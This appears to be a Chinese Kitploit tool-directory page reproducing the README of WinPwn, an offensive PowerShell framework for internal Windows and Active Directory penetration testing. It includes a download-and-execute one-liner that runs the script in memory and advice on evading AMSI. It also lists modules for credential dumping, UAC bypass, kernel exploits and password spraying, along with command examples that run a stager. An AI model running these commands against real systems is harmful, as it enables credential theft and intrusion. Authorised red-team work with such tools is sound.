Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WinPwn — 内部Windows渗透测试/AD安全自动化 | Kitploit
工具/GitHubGitHub/s3cur3th1ssh1t/winpwn
渗透测试框架权限提升侦察漏洞利用后渗透利用渗透测试红队后渗透利用 分类第 17 名权限提升 分类第 5 名
3.7k535251年前Kitploit 审核通过
GitHub
s3cur3th1ssh1t/winpwn

WinPwn

内部Windows渗透测试/AD安全自动化

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

赞助方

     

WinPwn

在过去的许多内部渗透测试中,我经常因为现有的 PowerShell 侦察/利用脚本缺乏代理支持而遇到问题。我也常常一个接一个地运行相同的脚本,以获取当前系统和/或域的信息。为了自动化尽可能多的内部渗透测试流程(侦察以及利用)以及解决代理问题,我编写了自己的脚本,它具备自动代理识别和集成功能。 该脚本主要基于其他著名的、大型的、面向攻击性安全的 PowerShell 项目。

欢迎提出任何建议、反馈、拉取请求和评论!

只需使用以下方式导入模块:

Import-Module .\WinPwn.ps1 或 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

要绕过 AMSI,请使用现有的 绕过技术 之一,找到 AMSI 触发器 并手动在 bypass 函数中更改它,或者对触发器字符串进行编码。或者,对整个脚本进行混淆处理。

如果你发现自己被困在一台没有互联网访问权限的 Windows 系统上——完全没问题,只需使用 Offline_Winpwn.ps1,其中包含了最重要的脚本和可执行文件。

导入后可用的函数:

  • WinPwn -> 选择攻击方式的菜单:

替代文本

  • Inveigh -> 在一个新的控制台窗口中执行 Inveigh,集成了 SMB-Relay 攻击与会话管理(Invoke-TheHash)

  • SessionGopher -> 执行 SessionGopher,询问参数

  • Kittielocal ->

    • 混淆版本的 Invoke-Mimikatz
    • 内存中的 Safetykatz
    • 使用 rundll32 技术转储 lsass
    • 下载并运行混淆后的 Lazagne
    • 转储浏览器凭据
    • 定制的 Mimikittenz 版本
    • 窃取 WiFi 凭据
    • 转储 SAM 文件 NTLM 哈希
    • SharpCloud
  • Localreconmodules ->

    • 收集已安装的软件、易受攻击的软件、共享资源、网络信息、用户组、权限等
    • 检查典型漏洞,如 SMB 签名、LLMNR 投毒、MITM6、WSUS over HTTP
    • 检查 PowerShell 事件日志中是否包含凭据或其他敏感信息
    • 收集浏览器凭据和历史记录
    • 在注册表和文件系统中搜索密码
    • 查找敏感文件(配置文件、RDP 文件、KeePass 数据库)
    • 在本地系统中搜索 .NET 二进制文件
    • 可选:Get-Computerdetails(Powersploit)和 PSRecon
  • Domainreconmodules ->

    • 收集各种域信息以供手动审查
    • 在描述字段中查找 AD 密码
    • 搜索潜在的敏感域共享文件
    • 枚举无约束委派系统/用户
    • 生成 Bloodhound 报告
    • 针对域系统的 MS17-10 扫描器
    • 针对域系统的 Bluekeep 扫描器
    • SQL Server 发现和审计功能 - PowerUpSQL
    • 针对域控制器或所有系统的 MS-RPRN 检查
    • 使用 Grouper2 进行组策略审计
    • 使用 ADRecon 生成 CSV 文件(如果安装了 Excel 则生成 XLS)的 AD 报告
    • 检查打印机是否存在常见漏洞
    • 搜索基于资源的约束委派攻击路径
    • 检查所有域控制器是否存在 zerologon - CVE-2020-1472
    • 以及更多,请自行查看
  • Privescmodules

    • itm4n 的 Invoke-PrivescCheck
    • winPEAS
    • Powersploit 的 PowerUp Allchecks、Sherlock、GPPPasswords
    • DLL 劫持、文件权限、注册表权限和弱键、Rotten/Juicy Potato 检查
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012)仅 x86!
    • MS16-032 - (2008/7/8/10/2012)!
    • MS16-135 - (仅 WS2k16)!
    • CVE-2018-8120 - 2018年5月,Windows 7 SP1/2008 SP2、2008 R2 SP1!
    • CVE-2019-0841 - 2019年4月!
    • CVE-2019-1069 - Polarbear Hardlink,需要凭据 - 2019年6月!
    • CVE-2019-1129/1130 - 竞态条件,需要多核 - 2019年7月!
    • CVE-2019-1215 - 2019年9月 - 仅 x64!
    • CVE-2020-0638 - 2020年2月 - 仅 x64!
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - 2020年3月 - 所有 Windows 版本
    • CVE-2021-34527/CVE-2021-1675 - 2021年6月 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - 2021年10月
    • Juicy-Potato 漏洞利用
    • itm4n 的 PrintSpoofer
  • UACBypass ->

    • UAC Magic,基于 James Forshaw 的三部分 UAC 文章
    • UAC Bypass cmstp 技术,来自 Oddvar Moe
    • DiskCleanup UAC Bypass,来自 James Forshaw
    • DccwBypassUAC 技术,来自 Ernesto Fernandez 和 Thomas Vanhoutte
  • SYSTEMShell ->

    • 使用 CreateProcess 弹出系统 Shell
    • 使用命名管道模拟弹出系统 Shell
    • 使用令牌操作弹出系统 Shell
    • 使用 UsoClient DLL 加载或 CreateProcess 绑定系统 Shell
  • Shareenumeration -> Invoke-Filefinder 和 Invoke-Sharefinder(Powerview / Powersploit)

  • Domainshares -> 在所有域系统上搜索 Snaffler 或 PassHunt

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - 通过组策略映射查找具有管理员访问权限或 RDP 访问权限的系统(Powerview / Powersploit)

  • Kerberoasting -> 在一个新窗口中执行 Invoke-Kerberoast,并存储哈希供后续破解

  • PowerSQL -> SQL Server 发现、使用当前用户检查访问权限、审计默认凭据 + UNCPath 注入攻击

  • Sharphound -> Bloodhound 3.0 报告

  • Adidnsmenu -> 创建或删除 Active Directory 集成 DNS 节点

  • MS17-10 -> 扫描域中的活动 Windows 服务器或所有系统是否存在 MS17-10(Eternalblue)漏洞

  • Sharpcradle -> 从远程 Web 服务器将 C# 文件加载到内存中

  • DomainPassSpray -> DomainPasswordSpray 攻击,一个密码尝试所有域用户

  • Bluekeep -> 针对域系统的 Bluekeep 扫描器

如果不带参数,大多数函数只能从交互式 shell 中使用。因此我添加了 -noninteractive 和 -consoleoutput 参数,使脚本可以从异步 C2 框架(如 Empire、Covenant、Cobalt Strike 等)中使用。 另外,添加了 -repo 参数,以便从本地仓库使用 WinPwn 的所有功能。它们的使用方法如下:

用法:

-noninteractive -> 函数不提问,使用预定义或用户定义的参数运行

-consoleoutput -> 不创建 loot/report 文件夹。每个函数将输出返回到控制台,以便你可以在 C2 框架的代理日志中查看所有内容。

示例:

WinPwn -noninteractive -consoleoutput -DomainRecon -> 这将执行每个域侦察脚本和函数,可能会产生非常多的输出

WinPwn -noninteractive -consoleoutput -Localrecon -> 这将尽可能多地枚举本地系统的信息

Generalrecon -noninteractive -> 执行基本的本地侦察函数,并将输出存储在相应的文件夹中

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> 从低权限会话中在高完整性进程中执行一个加载器

Kittielocal -noninteractive -consoleoutput -browsercredentials -> 通过 SharpWeb 转储浏览器凭据,输出到控制台

Kittielocal -noninteractive -browsercredentials -> 转储 SAM 文件 NTLM 哈希,并将输出存储在文件中

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> 在内存中执行 Seatbelt、PowerUp、Watson 等 C# 二进制文件

Dotnetsearch -consoleoutput -noninteractive -> 在 C:\Program Files\ 和 C:\Program Files (x86)\ 中搜索 .NET 程序集

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> 使用本地 Web 服务器作为离线仓库,在没有互联网访问的情况下使用 WinPwn

Get_WinPwn_Repo.sh:

用法: ./Get_WinPwn_Repo.sh {选项}

示例: ./Get_WinPwn_Repo.sh --install

选项: --install 下载仓库并放置到 ./WinPwn_Repo/ --remove 删除仓库 ./WinPwn_Repo/ --reinstall 删除仓库并下载新仓库到 ./WinPwn_Repo/ --start-server 在端口 8000 上启动 Python HTTP 服务器 --help 显示此帮助

待办事项

  • 一些混淆
  • 更多混淆
  • 支持 PAC 文件的代理
  • 从自己的凭据仓库(https://github.com/S3cur3Th1sSh1t/Creds)获取脚本,以独立于原始仓库的更改
  • 更多侦察/利用函数
  • 添加菜单以更好地处理函数
  • AMSI 绕过
  • 阻止 ETW

致谢

下载工具